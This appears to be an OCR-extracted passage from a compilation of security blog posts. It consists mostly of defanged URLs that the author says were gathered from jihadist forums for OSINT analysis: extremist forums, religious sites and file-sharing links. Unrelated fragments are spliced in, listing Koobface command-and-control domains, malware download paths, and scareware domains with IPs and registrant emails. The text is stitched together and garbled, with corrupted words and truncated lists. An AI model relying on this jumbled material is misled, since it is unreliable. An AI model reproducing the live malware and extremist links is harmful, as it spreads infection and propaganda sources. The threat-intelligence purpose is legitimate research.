hxxp://www.haqeeqga.com/index.aspx?status=prodetail &amp;aid=226 
hxxp://islamicweb.com/arabic/shia/husain.htm 
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hxxp://islamicweb.com/arabic/shia/shia _sects.htm 
hxxp://islamicweb.com/arabic/shia/history _of sects.htm 
hxxp://islamicweb.com/arabic/shia/ibn saba founder.htm 
hxxp://islamicweb.com/arabic/shia/ibn saba_true.htm 
hxxp://islamicweb.com/arabic/shia/history _fitna.htm 
hxxp://islamicweb.com/arabic/shia/Fatimid.htm 
hxxp://www.albainah.net/index.aspx?function=Item &amp;id=14364 


hxxp://www.alburhan.com/articles.aspx?id=1653 %20 &amp; %20paging _counter=0 &amp; 
%20page _size=5 &amp;book _link=False 


hxxp://www.alburhan.com/articles.aspx?id=1655 %20 &amp; %20paging _counter=0 &amp; 
%20page _size=5 &amp;book _link=False 


hxxp://www.alburhan.com/articles.aspx?id=1143 %20 &amp; %20paging _counter=0 &amp; 
%20page size=5 &amp;book _link=True 


hxxp://www.alburhan.com/articles.aspx?id=1307 %20 &amp; %20paging _counter=0 &amp; 
% 


hxxp://www.alburhan.com/articles.aspx?id=1010 %20 &amp; %20paging _counter=0 &amp; 
%20page _size=5 &amp;book _link=False 


hxxp://www.alburhan.com/articles.aspx?id=1276 %20 &amp; %20paging _counter=0 &amp; 
%20page size=5 &amp;book _link=False 


hxxp://www.haqeeqga.com/index.aspx?status=prodetail &amp;aid=153 
hxxp://www.haqeeqga.com/index.aspx?status=prodetail &amp;aid=154 
hxxp://www.haqeeqga.com/index.aspx?status=prodetail &amp;aid=219 
hxxp://www.haqeega.com/index.aspx?status=prodetail &amp;aid=36 
hxxp://www.hageega.com/index.aspx?status=prodetail &amp;aid=122 
hxxp://www.hageeqga.com/index.aspx?status=prodetail &amp;aid=35 
hxxp://www.haqeeqga.com/index.aspx?status=prodetail &amp;aid=37 
hxxp://www.islamway.com/?iw _s=Scholar &amp;iw _a=series &amp;series id=1108 
hxxp://www.islamway.com/?iw _s=Scholar &amp;iw _a=series &amp;series id=313 
hxxp://www.haqeega.com/AudioFile/ &amp;Oslash; 

hxxp://dhr12.com/?ri147 


hxxp://www.alburhan.com/articles.aspx?id=1403 %20 &amp; %20paging _counter=0 &amp; 
%20page size=5 &amp;book _link=False 


hxxp://www.alburhan.com/articles.aspx?id=1406 %20 &amp; %20paging _counter=0 &amp; 
%20page _size=5 &amp;book _link=False 


hxxp://dhr12.com/?mi198 


hxxp://www.alburhan.com/articles.aspx?id=1619 %20 &amp; %20paging _counter=0 &amp; 
%20page size=5 &amp;book _link=True 


hxxp://www.fnoor.com/sahaba.htm 
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hxxp://dhr12.com/?wi8 


hxxp://www.alburhan.com/articles.aspx?id=1201 %20 &amp; %20paging _counter=0 &amp; 
%20page _size=5 &amp;book _link=False 


hxxp://www.fnoor.com/media %5Cfn153.ram 

hxxp://www.fnoor.com/media %5Cfn232.ram 

hxxp://www.fnoor.com/media %5Cfn233.ram 
hxxp://www.fnoor.com/media/fn171.ram 

hxxp://www.fnoor.com/media/fn350.ram 

hxxp://www.fnoor.com/media %5Cfn084.ram 
hxxp://www.albainah.net/index.aspx?function=Item &amp;id=11356 &amp;lang= 
hxxp://www.alrased.net/show topic.php?topic type=3 
hxxp://islamicweb.com/arabic/shia/Persian Hate.htm 
hxxp://www.alrased.net/show topic.php?topic id=401 
hxxp://frqan.com/docs.php?docid=60 

hxxp://frqan.com/khlaf.php?artid=90 

hxxp://frqan.com/blacks.php?blackid=31 
hxxp://www.albainah.net/index.aspx?function=Item &amp;id=8760 &amp;lang= 
hxxp://www.albainah.net/index.aspx?function=Item &amp;id=12606 &amp;lang= 
hxxp://www.albainah.net/index.aspx?function=Item &amp;id=1298 &amp;lang= 
hxxp://www.albainah.net/index.aspx?function=Item &amp;id=14247 &amp;lang= 
hxxp://www.albainah.net/index.aspx?function=Item &amp;id=14035 &amp;lang= 
hxxp://www.albainah.net/index.aspx?function=Item &amp;id=13769 &amp;lang= 
hxxp://www.albainah.net/index.aspx?function=Item &amp;id=13702 &amp;lang= 
hxxp://www.albainah.net/index.aspx?function=Item &amp;id=13123 &amp;lang= 
hxxp://islammemo.cc/articlel.aspx?id=29833 
hxxp://www.mytempdir.com/1279427 

hxxp://misterupload.com/?d=6FOD2BF3 

hxxp://www.sendspace.com/file/8ifnux 
hxxp://www.megaupload.com/?d=9ZISJXKY 
hxxp://supasic.com/download.php?file=163686 
hxxp://up.9q9q.net/up/index.php?f=yzVUSP790 
hxxp://www.jabello.com/download.php?id=6516E16C1 
hxxp://www.titanicshare.com/download.php?id=4835D649 

hxxp://www. miniuploads.com/download.php?id=AFCD855C 
hxxp://www.getupload.com/en/file/4435/message-ram.html 
hxxp://www.sharebigfile.com/file/129...ssage-rar.html 
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hxxp://www17.rapidupload.com/uploade...filepath=16593 


hxxp://www.egoshare.com/6acd1d7ef42a...essageram.html 


hxxp://www.divshare.com/download/183519-e76 
hxxp://www.divshare.com/download/183524-637 
hxxp://www.divshare.com/download/183535-0ae 
hxxp://www.divshare.com/download/183541-6c2 
hxxp://www.divshare.com/download/183545-cel 
hxxp://www.divshare.com/download/183549-deb 
hxxp://www.divshare.com/download/183565-a30 
hxxp://www.divshare.com/download/183567-164 
hxxp://www.divshare.com/download/183570-a08 
hxxp://www.divshare.com/download/1835 73-343 
hxxp://www.divshare.com/download/183574-d71 
hxxp://www.divshare.com/download/183579-dec 
hxxp://www.divshare.com/download/183587-74f 
hxxp://www.divshare.com/download/183592-947 
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u15jul.com 


umidsummer.com 


face C &C again parked at the same IP, which remains active - zaebalinax .com Email: 
krotreal@gmail.com - 78.110.175.15 - in particular zaebalinax .com/the/?pid=14010 which is 
redirecting to the Koobface botnet. Two more domains were also registered and parked there, 
ul15jul .com and umidsummer .com - Email: 2009polevandrey@mail.ru which remain in stand 
by mode at least for the time being. 


Upon execution the Koobface binary phones back to upr0306 .com/achcheck.php; upr0306 
.com/Id/gen.php (78.110.175.15) and attempts to download upload.octopus-multimedia 
:be/1/pdrv.exe; upload.octopus-multimedia .be/1/pp.10.exe. 


UKSERVERS-MNT (AS42831) is also Known with its connections to gumblarcn malware 
campaigns, as well as having hosted a domain (supernerd.org) part of a [9]Photobucket 
malvertising campaign. 
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Part twenty three of the diverse portfolio of fake security software series, will once again sum- 
marize the scareware domains currently in circulation, delivered through the usual channels 
- blackhat SEO, compromises of legitimate web sites, comment spam and bogus adult web 
sites, with an emphasis on a yet another bogus company acting as a front-end to an affiliate 
network - AK Network Commerce Ltd. 


Scareware remains the dominant monetization tactic applied by cybercriminals automat- 
ically abusing Web 2.0 properties. 
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hxxp://www.quraan.com/Italian/Default.asp 
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hxxp://www.arabia-saudita.it/Ambasc...troduzione.html 
hxxp://www.wamy.co.uk/quranitalian/frame.html 
hxxp://www.islam-online.it 
hxxp://www.islam-guide.com/it/ 
hxxp://www.religionofislam.com/italian/index.htm 
hxxp://www.muslimthai.com/ 
hxxp://www.addeen.com/ 
hxxp://www.muslimthai.com/islam/maodoor.html 
hxxp://www.muslimthai.com/quran/ 
hxxp://www.sunnahcyber.com/ 
hxxp://www.religionofislam.com/thai/index.htm 
hxxp://www.islamway.com/urdu/index.htm 
hxxp://www.pakdata.com/quran/ 
hxxp://www.dar-us-salam.com/s-urdu.htm 
hxxp://www.taiba.org/Khutab/khutab.htm 
hxxp://islamicity.com/radio/ch156.htm 
hxxp://www.as-Sahwah.com/audio/urdu.htm 
hxxp://www.allaahuakbar.net/urdu/index.htm 
hxxp://www.geocities.com/auua7/namaz/main.htm 
hxxp://www.geocities.com/ski hawk2001/ 
hxxp://www.albalagh.net/audio/ 
hxxp://www.hadayet.net 
hxxp://www.religionofislam.com/urdu/index.htm 
hxxp://www.al-islaam.de 
hxxp://www.muslim-markt.de 
hxxp://www.minhaj.de/Deutsch/deutsch.html 
hxxp://www.salaf.de 
hxxp://www.islam.de/ 
hxxp://www.orst.edu/groups/msa/books/nawawi _g.html 
hxxp://www.orst.edu/groups/msa/quran/index _g.html 
hxxp://www.al-islam.com/ger/ 
hxxp://www.radioislam.net/protocols/quote-ger.htm 
hxxp://www.islamworld.net 
hxxp://www.harunyahya.org/de/index.html 
hxxp://www.islam-guide.com/de/ 
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hxxp://www.religionofislam.com/german/index.htm 
hxxp://www.geocities.com/Athens/Parthenon/2355/ 
hxxp://www.religionofislam.com/swahili/index.htm 
hxxp://www.isuramu.net/kuruan/index.html 
hxxp://www.islam-guide.com/jp/ 
hxxp://www.religionofislam.com/japanese/index.htm 
hxxp://www.islamhouse.org/ch/index.php 
hxxp://www.glink.net.hk/ hkiya/index.html 
hxxp://www.glink.net.hk/ hkiya/c _quran.html 
hxxp://www.wamy.co.uk/cn-islam1/cn-mainFrame.htm 
hxxp://www.islam-guide.com/cn/ 
hxxp://www.islam-guide.com/cs/ 
hxxp://www.islam-guide.com/ct/ 
hxxp://www.religionofislam.com/chinese/index.htm 
hxxp://www.muslimtents.com/banglaquran/quran/list.htm! 
hxxp://www.banglaislam.com/main.htm 
hxxp://listen.to/banglaquran 
hxxp://www.religionofislam.com/bengali/index.htm 
hxxp://www.al-madeena.com/bangla 
hxxp://www.islamhouse.org/ru/index.php 
hxxp://www.quran.org.ua 

hxxp://www.alazhr.com 

hxxp://www.koran.ru 

hxxp://www.koranet.net 
hxxp://www.circassia.net/suraqa 
hxxp://www.koran-valeria.narod.ru 
hxxp://www.kuran.gen.tr/html/russian 
hxxp://www.belarus.net/koran/koran _1.htm 
hxxp://www.islamnews.ru 
hxxp://www.islamua.net/gazeta 
hxxp://www.islaminfo.ru 
hxxp://www.nurlat.kazan.ws 
hxxp://www.muslimuzbekistan.com 
hxxp://www.kavkazcenter.com 
hxxp://www.religio.ru/news/islam/index.htm| 
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hxxp://www.palestine-info.ru 
hxxp://www.al-aqsa.boom.ru 
hxxp://www.al-aksa.narod.ru 
hxxp://www.iudaizm-protiv-sionizma.ru 
hxxp://www.abbc.com/russ/index.htm| 
hxxp://www.islamUA.net 
hxxp://www.islamhouse.org/ru 
hxxp://www.islam.kz 
hxxp://www.slam-alejkum.narod.ru 
hxxp://www.religionofislam.com/russian/index.htm 
hxxp://www.harunyahya.ru 
hxxp://www.evolutiondeceit.com/russian/index.php 
hxxp://www.bedir.ru 
hxxp://www.arraid.org 
hxxp://www.abubekr.narod.ru 
hxxp://www.umma.ru 
hxxp://www.toislam.com 
hxxp://www.aboutislam.ws 
hxxp://www.islam.boom.ru 
hxxp://www.ummah.ru 
hxxp://www.faida.narod.ru 
hxxp://home.swipnet.se/islamguiden/ 
hxxp://www.darulhadith.com/ 
hxxp://www.kavkaz.org/ 
hxxp://www.islamiska.org 
hxxp://www.islam.ch/mms/ 
hxxp://www.islamguiden.com 
hxxp://www.religionofislam.com/swedish/index.htm 
hxxp://www.wamy.co.uk/leaflets/danishmenu.html 
hxxp://www.radioislam.net/protocols/quote-dan.htm 
hxxp://www.al-islam.dk 
hxxp://www.religionofislam.com/danish/index.htm 
hxxp://www.religionofislam.com/ukranian/index.htm 
hxxp://www.ahlesonnat.com/ 
hxxp://www.religionofislam.com/farsi/index.htm 
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hxxp://www.somaliislamic.com/ 
hxxp://www.religionofislam.com/somalian/index.htm 
hxxp://www.religionofislam.com/hausa/index.htm 
hxxp://www.muslimuzbekistan.boom.ru/ 
hxxp://www.islamnuri.com/ 
hxxp://www.religionofislam.com/uzbeki/index.htm 
hxxp://www.planetaislam.com 

hxxp://www.islam.pl 

hxxp://free.ngo.pl/islamiq/ 
hxxp://www.religionofislam.com/polish/index.htm 
hxxp://www.angelfire.com/vt/vietnamesemuslims 
hxxp://www.radioislam.net/protocols/quote-sve.htm 
hxxp://www.islam.ro 

hxxp://www.islam.ro/Coran.htm 
hxxp://www.islam.ro/femeia.htm 
hxxp://www.islam4kurds.com 
hxxp://www.religionofislam.com/hungarian/index.htm 
hxxp://www.religionofislam.com/malayalam/index.htm 
hxxp://www.religionofislam.com/nepalese/index.htm 
hxxp://www.religionofislam.com/pushto/index.htm 
hxxp://www.religionofislam.com/uighur/index.htm 
hxxp://www.religionofislam.com/yoruba/index.htm 
hxxp://saaid.net/book/open.php?cat=92 &amp;book=1056 
hxxp://www.islamhouse.org/en/books.php 
hxxp://www.islamhouse.com/dc/books/chchn/chchn2232.txt 
hxxp://www.MegaShare.com/140660 
hxxp://www.zshare.net/download/3332-rar.html 
hxxp://www.filefactory.com/file/b24372/ 
hxxp://www.filefactory.com/file/8b406b/ 
hxxp://ia340927.us.archive.org/3/ite...m-char3i-1.wmv 
hxxp://ia340927.us.archive.org/3/ite...m-char3i-2.wmv 
hxxp://ia340927.us.archive.org/3/ite...n-takfir-1.wmv 
hxxp://ia340927.us.archive.org/3/ite...n-takfir-2.wmv 
hxxp://ia340927.us.archive.org/3/ite...ti-sanam-1.wmv 
hxxp://ia340927.us.archive.org/3/ite...ti-sanam-2.wmv 
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hxxp://ia340927.us.archive.org/3/ite...mokratie-1.wmv 
hxxp://ia340927.us.archive.org/3/ite...mokratie-2.wmv 


hxxp://ia340927.us.archive.org/3/ite...al-ommya-1.wmv 


hxxp://fyad.org/k3yf 

hxxp://fyad.org/k3yo 
hxxp://file.uploadr.com/bc54 
hxxp://www.sendspace.com/file/igbias 
hxxp://www.sendspace.com/file/hOvioz 
hxxp://www.sendspace.com/file/ulvogm 
hxxp://www.sendspace.com/file/ld3mhc 
hxxp://desiupload.net/?d=D973EAC2 
hxxp://www.sendspace.com/file/izIx5d 
hxxp://www.sendspace.com/file/t98yyf 
hxxp://www.sendspace.com/file/piz8ur 
hxxp://www.sendspace.com/file/7v57q)} 
hxxp://www.sendspace.com/file/govta6 
hxxp://www.sendspace.com/file/46rhdz 
hxxp://www.sendspace.com/file/sefvda 
hxxp://www.sendspace.com/file/it8g3m 
hxxp://www.sendspace.com/file/wi3ep5 
hxxp://www.sendspace.com/file/r0097p 
hxxp://www.sendspace.com/file/9005cv 
hxxp://www.sendspace.com/file/ecOzy9 
hxxp://www.sendspace.com/file/ghfm45 
hxxp://misterupload.com/?d=7336FA2A 
hxxp://misterupload.com/?d=8D6B3C5B 
hxxp://www.rogepost.com/n/4561633573 
hxxp://www.sendspace.com/file/42mop2 
hxxp://www.sendspace.com/file/odm5vm 
hxxp://uploadport.com/request/?fid=U844E 
hxxp://www.megaupload.com/?d=TLP2Y4UX 
hxxp://razr-host.net/download.php?file=5 7367 
hxxp://razr-host.net/download.php?file=36415 
hxxp://www.megaupload.com/?d=NV029A3X 
hxxp://www.megaupload.com/?d=ALMOIAAQ 
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hxxp://www.3llm.com/main/download.php?action=download &amp;fileid=649 
hxxp://d.turboupload.com/d/1002569/Aqeedal1.rar.html 
hxxp://www.oxyshare.com/get/14448469...eedal.rar.html 
hxxp://d.turboupload.com/d/1007203/Aqeedaz2.rar.html 
hxxp://www.rogepost.com/dn/h2xr 
hxxp://d.turboupload.com/d/1184903/aqeeda3.rar.html 
hxxp://www.tawhed.ws/c?i=210 
hxxp://www.tawhed.ws/r?i=2583 
hxxp://www.rslan.com/vad/items.php?chain _id=75 
hxxp://www.tawhed.ws/r?i=482 
hxxp://www.rogepost.com/dn/fkiq 
hxxp://www.rogepost.com/dn/4x8i 
hxxp://www.fileflyer.com/view/6KJaDA2 
hxxp://www.sendspace.com/file/Ohotu8 
hxxp://www.bigupload.com/d=94EB6A7D 

hxxp://www. bigupload.com/d=D3D9022E 
hxxp://www.bigupload.com/d=23D71E6D 

hxxp://www. bigupload.com/d=AA5DA962 
hxxp://www.sendspace.com/file/Ohczq7 
hxxp://www.bigupload.com/d=AE1E42F3 
hxxp://www.sendspace.com/file/zwqyzf 
hxxp://up.9q9q.net/up/index.php?f=CFB1YwYWv 
hxxp://Z02.zupload.com/download.php?...filepath=10669 
hxxp://s9.quicksharing.com/v/5044189/sasasar5.rar.html 
hxxp://www.up4world.com/download1.ph...BHEqw4EWIIt6bb 
hxxp://www.up4world.com/download1.ph...AcKeOiFC7QSsSB6 
hxxp://s9.quicksharing.com/v/62950/yuuuiooo90.rar.html 
hxxp://www.up4world.com/download1.ph...pW8YEvtE8VcYXv 
hxxp://contactus.arabform.com 
hxxp://www.openupload.com/?d=A9EF6BAB 
hxxp://www.thaisavefile.com/download.php?id=F3F4F678 
hxxp://share-your-files.com/file/153...afdff.rar.htm! 
hxxp://www.sendspace.com/file/kmklso 
hxxp://www.sendspace.com/file/oxmssb 
hxxp://www.sendspace.com/file/j0i6re 
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hxxp://www.sendspace.com/file//jcn941 
hxxp://www.sendspace.com/file/mdrxzf 
hxxp://depositfiles.com/files/344121 
hxxp://depositfiles.com/files/344125 
hxxp://www.MegaShare.com/70497 
hxxp://www.badongo.com/file/1620500 
hxxp://www.mytempdir.com/1023050 
hxxp://www.sendspace.com/file/bdeycx 
hxxp://www.megaupload.com/?d=U9R9YOUC 
hxxp://www.megaupload.com/?d=NTVFXA8I 


hxxp://Z21.zupload.com/download.php?... &amp;filepath=1498 


hxxp://d.turboupload.com/d/1141350/R...44970.rar.html 
hxxp://www.upload2.net/page/download...44970.rar.html 
hxxp://www.s6.quicksharing.com/v/605...44970.rar.html 
hxxp://www.zshare.net/download/rapid...44970-rar.html 
hxxp://up-file.com/download/ela77633...44970.rar.html 
hxxp://www10.rapidupload.com/d.php?f...filepath=32832 
hxxp://www.up4world.com/download1.ph...TOkVqy4w4owCzl 
hxxp://s9.quicksharing.com/v/2722052/fffftrttt.rar.htm! 
hxxp://s9.quicksharing.com/v/1716681...00000.rar.html 
hxxp://www.up4world.com/download1.ph...asOEcrd1W23CXj 
hxxp://s9.quicksharing.com/v/711657/nnnjuikkoi.rar.html 
hxxp://www.up4world.com/download1.ph...sw2lurYnFmMXWYR 
hxxp://www.lib.utexas.edu/maps 


hxxp://www.filehippo.com/download/file/244e0162e9e22a845cfad91f89585e494dba 


517ba246cf4d15e10bf00609c7b2/ 

hxxp://www.???.com 

hxxp://www.???.net 

hxxp://ftp.3asfh.com 

hxxp://www.netcraft.com 

hxxp://www.dns411.com 

hxxp://www.dns411.com/ 
hxxp://www.freeware.de/software/Prog... EN 10164.html 
hxxp://www.securiteam.com/tools/5XPOX0040G.html 
hxxp://www.securityfocus.com/ 


hxxp://www.theupload.com/view. php?id=00034356 
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hxxp://www.theupload.com/view.php?id=00034357 

hxxp://www.sendspace.com/file/pdsupf 

hxxp://www.sendspace.com/file/21dwou 

hxxp://www.savefile.com/files.php?fid=6191894 

hxxp://www.savefile.com/files/1600264 

hxxp://www.sendmefile.com/00362249 

hxxp://www.sendmefile.com/00362250 

hxxp://www. yousendit.com/transfer.php?action=download &amp;ufid=15A13F8761FD8BFE 
hxxp://www. yousendit.com/transfer.php?action=download &amp;ufid=37CD7F471BC02805 
hxxp://mv.vatican.va 

hxxp://www.sa32.com/files/5262eb3701...Dorah.zip.html 
hxxp://www.bigupload.com/d=048617CE 
hxxp://www.zshare.net/download/dorah-zip-ean.html 
hxxp://html4arab.com/StartHere/starthereindex.htm| 
hxxp://www.opendirectorysite.info/173.htm 
hxxp://www.arabteam2000-forum.com/index.ph...=O0 &amp; #entry422406 
hxxp://www.uploading.com/?get=NWVXRUIQ 

hxxp://www.tawhed.ws/r?i=3194 

hxxp://messenger.arabic.arabia.msn.com/Download/ 

hxxp://arabic.arabia.msn.com 


hxxp://www.unyk.com 


1. https://blogger . googleusercontent . com/img/b/R29vZ2x1/AVvXsEhIR-GRLnK j OVTCYbKr620h4z1g-Y7xA4yEC jHvtnYwk1S1 
OhIObTcNGSfHrdaJTLA1n3uailLHiORfg7EkhOnXXFyMT_fyzLA4gp 


18.8.11 A Compilation of Publicly Accessible URLs Found on Cyber Jihad Forums - 
Part Six - An OSINT Analysis (2022-08-09 13:42) 


oll} as) 
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adware-2010 .com - 67.211.161.49 

adware-2009.comantispyware2013 .com - 98.124.199.1; 98.124.198.1 

antispyware2012 .com 

securityscanweb .com - 209.44.126.22 - Email: Gerald.A.Flowers@trashymail.com 
securitytestavailable .com - 209.44.126.81 - Email: Roy.M.Tucker@pookmail.com 
liveantivirusinfov2 .com - 78.47.132.222; 78.47.172.69 - Email: cgrenier@reclamation.com 
antivirus-scannerv9 .com - Email: paul.smith@acdc.cn 

purchuaseonlinedefence .com - 78.47.91.154 - Email: jenny@allbestmarine.com.sg 
purchuaseliveprotection .com - Email: jenny@allbestmarine.com.sg 


windowssecurityinfo .com - 83.133.123.113 - Email: arziw12@freebbmail.com 
antimalwarescanner-v2 .com - Email: tareen@yahoo.com 
maliciousbaseupdates .com - Email: freight@beds.com 

ieprotectionlist .com - Email: vanmullem@yahoo.com 


# Cleaner2009 FEATURES SUPPORT GUY NOW 


You are Not Safe! 
What evidence does your computer have? 


(>) THIS IS HOW COMPROMISING FILES GET STORED IN YOUR COMPUTER! 


You tat adult rotated 
ules. 


Whe you teawse webstes 


poemograghe: content perrressioe et cand infeemabon of Ne evsence 


© THIS IS HOW COMPROMISING FILES GET STORED IN YOUR COMPUTER! 


personalcleaner2009 .com - 88.208.19.4 - Email: personalcleaner2009.com@liveinternetmark- 
etingltd.com 

ak-networkcommerce .com - Email: ak-networkcommerce.com@liveinternetmarketingltd.com 
pc-antimalwaresuite .com - Email: pc-antimalwaresuite.com@liveinternetmarketingltd.com 
basepayment .com - Email: basepayment.com@liveinternetmarketingltd.com 
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Folks, 


Here’s the second batch of URLs found on publicly accessible cyber jihad forums which | 


obtained using technical collection. 


Sample URLs found on publicly accessible cyber jihad forums include: 


hxxp://abubakr1400.blogspot.com/ 
hxxp://ageofjahiliyah.wordpress.com/ 
hxxp://alkarnee.wordpress.com 
hxxp://arabicgems.wordpress.com 
hxxp://istiqaamah.wordpress.com 
hxxp://www.crusaderwatcher.blogspot.com/ 
hxxp://dajjalwatch.wordpress.com 
hxxp://danielaljughaifi.wordpress.com 
hxxp://siyasah.wordpress.com 
hxxp://islamicconquestofsyria.blogspot.com 
hxxp://gulfcoastafrican.blogspot.com 
hxxp://feesabeelillah.blogspot.com 
hxxp://bintulislam.wordpress.com 
hxxp://www.inshallahshaheed.wordpress.com 
hxxp://abusayfullaah.wordpress.com 
hxxp://islamicink.wordpress.com 
hxxp://mujahidfisabeelillah.wordpress.com 
hxxp://moderatesrefuted.wordpress.com 
hxxp://muslim-wife.blogspot.com 
hxxp://shaheenvision.wordpress.com 
hxxp://muslimsinkenya.wordpress.com 
hxxp://amatullah51.wordpress.com 
hxxp://shiaexposed.blogspot.com 
hxxp://amreekan.wordpress.com 
hxxp://alqasam.blogsome.com 
hxxp://truthline.wordpress.com 
hxxp://walaabaraa.wordpress.com 
hxxp://fajr.wordpress.com 
hxxp://wehearandweobey.wordpress.com 
hxxp://al-sunnah.com/nektar 
hxxp://hizmetbooks.org 
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hxxp://www.islamibayanaat.com/EnglishMarefulQuran.htm 
hxxp://www.box.net/shared/2rm4zjp3z7 
hxxp://www.usc.edu/dept/MSA/fundamentals/tawheed/ 
hxxp://www.usc.edu/dept/MSA/fundamentals/prophet/ 
hxxp://beconvinced.com/en/main.php 
hxxp://dislam.org 

hxxp://harunyahya.com 

hxxp://islamtomorrow.com 

hxxp://islam-guide.com 
hxxp://www.usc.edu/dept/MSA/fundamentals/pillars/ 
hxxp://sultan.org 
hxxp://www.usc.edu/dept/MSA/fundamentals/hadithsunnah/ 
hxxp://thewaytotruth.org/index.html 
hxxp://turntoislam.com 
hxxp://haqaonline.com/multimedia/dua 
hxxp://islamicacademy.org/html/Dua/Dua.html 
hxxp://islamawareness.net/Dua 

hxxp://makedua.com 
hxxp://geocities.com/mutmainaa/dua.html 
hxxp://www.muntadaa.aswj.net 
hxxp://forums.almaghrib.org/? 
hxxp://antiimperialist.16.forumer.com/index.php 
hxxp://cageprisoners.com/forums/index.php? 
hxxp://fussilat.org/forums/index.php? 
hxxp://www.hijra.net/forum/ 
hxxp://forum.islamic-audios.com 
hxxp://forums.islamicawakening.com 
hxxp://islamicthinkers.com/forum/index.php? 
hxxp://leemedia.net/index.php 
hxxp://www.Muslimhackers.com 
hxxp://muslimasoasis.com 
hxxp://www.pearls-of-jannah.com 
hxxp://at-tawheed.com 
hxxp://www.unitedummah.islamic-audios.com 
hxxp://iiu.edu.my/deed/hadith 
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hxxp://www.sacred-texts.com/isl/oukhari/index.htm 
hxxp://www.islamonline.net/English/HadithAndltsSciences/HadithStudies/2005/ 07/01.shtml 
hxxp://www.usc.edu/dept/MSA/reference/searchhadith.html 
hxxp://audioislam.com/index.php 

hxxp://www.ilmquest.org/default.aspx?skinid=1 & #038;affiliateid=10054 


hxxp://islambase.co.uk/index.php?option=com content & #038;task=view & #038;id=164 & 
#038;ltemid=26 


hxxp://islamic-download.com/index.php 
hxxp://english.islamway.com/sindex.php?section=erecitorslist 
hxxp://maktabah.net/Home.asp 
hxxp://muslimaccess.com/audio/index.asp 
hxxp://quran.jalisi.com 
hxxp://alkhilafah.net 
hxxp://al-qaria.net/index.php 
hxxp://shiism.blogspot.com 
hxxp://darulislam.info 
hxxp://deenport.com 
hxxp://altimimi.org 
hxxp://sultan.org/shia.html 
hxxp://www.gawab.com/webfront/main.php 
hxxp://www.usc.edu/dept/MSA/reference/glossary.htm| 
hxxp://haqaonline.com 
hxxp://imranhosein.org 
hxxp://islamrocks.com 
hxxp://islamicawakening.com 
hxxp://islamicity.com 
hxxp://jannah.org 
hxxp://kalamullah.com/index.html 
hxxp://www.khutbah.com/index.php?type=5 & #038;id=575 & #038;language=8 
hxxp://madinaharabic.com 
hxxp://masud.co.uk 
hxxp://nuradeen.com/nuradeen.htm 
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hxxp://www.vietsharing.us/?d=586EC25E 
hxxp://www.megaupload.com/?d=R1VO02CYR 
hxxp://www.sendspace.com/file/6lyt1j 
hxxp://www.fileblob.com/download.php?id=DB7COCE4 
hxxp://www. bigupload.com/d=0F734831 
hxxp://www.uploading.com/files/GZMTQQ6L/new1.rar.html 
24544 


hxxp://www.uploading.com/files/XY5BOHN4/new1.rar.html 
hxxp://www.alemarah.org/ 
hxxp://rabbizidniilma.wordpress.com/ 


hxxp://www.jihadunspun.com/intheatre _external.php?article=107348 &amp;list=/index.php 
&amp; 


hxxp://darvish.wordpress.com/2006/12/13/the-sufi-counsels-the-sultan/ 
hxxp://www.fussilat.org/forums/ 
hxxp://www.iht.com/articles/2007/01/15/news/journal.php 
hxxp://islamicconquestofsyria.blogspot.com/ 
hxxp://www.islamiya.webbyen.dk 
hxxp://caravanofmartyrswordpress.com/ 
hxxp://tibyaan.atspace.com/tibyaan/articlee4af.html?id=717 
hxxp://www.sendspace.com/file/48nr5u 
hxxp://www.abubakr1400.blogspot.com 
hxxp://arrihlah.blogspot.com 
hxxp://thecaliphate.wordpress.com 


1. https: //blogger . googleusercontent .com/img/b/R29VZ2x1/AVvXsEhOplqjsI-vz26zVgqg8to50n-zEXSSD40Y8_CpqlnV6yljq 
X2_TBF4DeyLxiHGAv5Lit 1kY6HRBB8yqUvUm4mfGM_647tYQItdZP. 


18.8.12 A Compilation of Publicly Accessible URLs Found on Cyber Jihad Forums - 
Part Seven - An OSINT Analysis (2022-08-09 13:42) 
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[1] 
Folks, 


Here’s the second batch of URLs found on publicly accessible cyber jihad forums which | 
obtained using technical collection. 


Sample URLs found on publicly accessible cyber jihad forums include: 
hxxp://alnosra.rasIny.com/ 
hxxp://www.alnusra.net/vb/ 
hxxp://www.mogahid.com/files/zewar.html 
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hxxp://www.jeeran.com/asp-bin/hp/addons/guestbook/guestbook.asp?ra qam=180ar1186741- 
79783-53631-16921 Q&CurrentDir=alansarl1l &GBID=171542 &username=alansarll &ac- 
tion=ViewEntries &lang=a 


hxxp://www.alnusra.net/vb/index.php? 
hxxp://www.mados1.com/ baytalma/v/ 
hxxp://www.alhesbah.org/v/ 
hxxp://www.freemenbar.com/ 
hxxp://www.abualbokhary.net/ib/ 
hxxp://abu-qatada.com/r?i=1305 &PHPSESSID=bfda41a65a3c5fa9854112ce654f41 33 
hxxp://abu-qatada.com/r?i=2194 
hxxp://ghorabaa.2lebnan.com/ 
hxxp://iairaq.ws/upload/index.php 
hxxp://www.geocities.com/m _alu3dad4/ 
hxxp://www.eqla3.gwgaming.net/vbb/ 
hxxp://www.mogahid.com/files/aljehad.html 
hxxp://www.alhesbah.com/v/ 
hxxp://www.mogahid.com/files/Sites.html 
hxxp://asia.geocities.com/mohajerlb/ 
hxxp://www.mogahid.com/files/News.html 
hxxp://www.al-saf.net/vb/ 
hxxp://www.mogahid.com/files/Video.html 
hxxp://qa3edon.100free.com/index.htm 
hxxp://www.mogahid.com/files/Paeans.html 
hxxp://www.al-farouq.com/vb/ 
hxxp://www.mogahid.com/files/pictures.html 
hxxp://www.zimas.5gigs.com/vb/ 
hxxp://www.zimas.5gigs.com/index.htm 
hxxp://www.mogahid.com/files/Country.html 
hxxp://www.islamic-f.net/vb/ 
hxxp://www.mogahid.com/files/islam.html 
hxxp://www.goafalaladyn.com/vb/index.php 
hxxp://www.mogahid.com/files/Bands.html 
hxxp://www.f3ms.com/ 
hxxp://www.mogahid.com/files/sehha.html 
hxxp://www.soutweb.nel.net/ 
hxxp://www.mogahid.com/files/Services.html 
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hxxp://alghorabaa.net/forums/index.php 
hxxp://www.ashefaa.com/ 
hxxp://www.islamfajr.com/ 
hxxp://members.hostedscripts.com/top.cgi?user=001 
hxxp://www.gosaas.com/ 

hxxp://www.qawim.org/ 

hxxp://www.palgates.net/ 
hxxp://www.ratteb.com/ashefaa.com 
hxxp://www.ratteb.com/yarabb1.php?id=1460 
hxxp://www.freewebs.com/radiosoutjehad/index.htm 
hxxp://news.stcom.net/index.php?newlang=arabic 
hxxp://www.rightword.net/Anuke/index.php 
hxxp://www.almokhtsar.com/html/ 
hxxp://www.islamtoday.net/albasheer/news.cfm 
